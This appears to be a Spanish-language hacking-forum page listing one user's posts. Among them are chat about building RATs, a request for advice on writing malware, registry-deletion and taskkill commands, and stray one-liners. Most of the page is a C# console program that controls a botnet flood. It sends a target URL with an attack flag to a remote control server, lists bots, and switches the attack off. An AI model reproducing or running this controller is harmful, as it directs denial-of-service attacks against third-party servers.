Cita de: Shout en 29 Septiembre 2014, 13:59 PM
Si tienes tiempo, ganas, y conocimiento como para crear un RAT, dudo que los sockets sean un problema.
Exacto

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.
Mostrar Mensajes MenúCita de: Shout en 29 Septiembre 2014, 13:59 PM
Si tienes tiempo, ganas, y conocimiento como para crear un RAT, dudo que los sockets sean un problema.
Cita de: someRandomCode en 30 Septiembre 2014, 14:24 PM
Y si intentas lo siguiente:
taskmgr
taskkill /f /im explorer.exe
cmd
reg delete HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_BFILTER\0000
Que error te sacude reg desde cmd?
O acaso hay algo que te respawnea el valor? eso seria interesante de saber porque podriamos rastrearlo..
class Program
{
public static string command;
static void Main(string[] args)
{
Console.ForegroundColor = ConsoleColor.White;
string a = System.IO.File.ReadAllText(@"D://films.txt");
Console.WriteLine(a);
Console.Beep();
Console.Title = ("Samambleke");
Console.Write("@root: ");
command = Console.ReadLine();
if (command.Contains("flood -g "))
{
Console.ForegroundColor = ConsoleColor.Green;
command = command.Replace("flood -g", "");
Console.ForegroundColor = ConsoleColor.Red;
Console.WriteLine("Testing the server..");
//Probando estado del servidor
try
{
var img = (new WebClient().DownloadString(command));
string URL = "http://server.com/zone.php";
WebClient webClient = new WebClient();
NameValueCollection formData = new NameValueCollection();
if (command.Contains(" "))
{
command = command.Replace(" ", "");
}
formData["page"] = command;
formData["attack"] ="ok";
byte[] responseBytes = webClient.UploadValues(URL, "POST", formData);
string responsefromserver = Encoding.UTF8.GetString(responseBytes);
Console.WriteLine(responsefromserver);
webClient.Dispose();
Console.ForegroundColor = ConsoleColor.Green;
Console.Write(" ---- Server ---- ");
Console.WriteLine(img);
Console.ForegroundColor = ConsoleColor.Red;
Console.WriteLine("_______________________________________");
Console.Write("Status attack: ");
Console.ForegroundColor = ConsoleColor.Green;
Console.Write("Send \n");
}
catch
{
Console.ForegroundColor = ConsoleColor.Red;
Console.WriteLine("Error can that server is overloaded or there is a problem in the conexion to server");
OnError();
}
}
else if (command == "")
{
OnError();
}
else if (command == "view bots")
{
string page = (new WebClient().DownloadString("http://server.com/pagina.txt");
if (page.Contains("http://"))
{
Console.ForegroundColor = ConsoleColor.Green;
}
else
{
Console.ForegroundColor = ConsoleColor.Red;
}
string e = System.IO.File.ReadAllText(@"D://films2.txt");
Console.WriteLine(e);
Console.ForegroundColor = ConsoleColor.Red;
Console.WriteLine(page);
}
else if (command == "flood -s")
{
try
{
string URL = "http://server.com/zone.php";
WebClient webClient = new WebClient();
NameValueCollection formData = new NameValueCollection();
if (command.Contains(" "))
{
command = command.Replace(" ", "");
}
formData["page"] = "none";
formData["attack"] = "no";
byte[] responseBytes = webClient.UploadValues(URL, "POST", formData);
string responsefromserver = Encoding.UTF8.GetString(responseBytes);
webClient.Dispose();
Console.ForegroundColor = ConsoleColor.Green;
Console.Write("Status attack: ");
Console.ForegroundColor = ConsoleColor.Red;
Console.Write("OFF \n");
}
catch
{
Console.ForegroundColor = ConsoleColor.Red;
Console.WriteLine("Error in conexion");
}
}
else if (command == "clear")
{
Console.Clear();
}
else if (command == "exit")
{
Environment.Exit(1);
}
else
{
Console.ForegroundColor = ConsoleColor.Red;
Console.WriteLine("Command: " + command + " unknow");
OnError();
}
OnError();
}
cls
cls hola amigos jaja jeje xd l la jajajaj oooo noooooo rayos!
Cita de: MCKSys Argentina en 29 Septiembre 2014, 05:26 AM
Hola!
Prueba esta pagina.
Saludos!
PD: Eso se llama ASCII ART.
Cita de: Nikoxx99 en 27 Septiembre 2014, 17:58 PM
Hola, quisiera saber sus opiniones sobre el tema.
Me quiero iniciar en el mundillo de la programacion, principalmente de malware, como rats, crypters, etc.
Quisiera saber que lenguaje piensan que es el mejorsillo para empezar, estoy entre VB.NET, VB, Delphi, Ruby, Phyton, incluso C o C++ pero bueno.
les pregunto a ustedes que algunos aqui son ya Modders, me den su opinion.
Muchas gracias de antemano.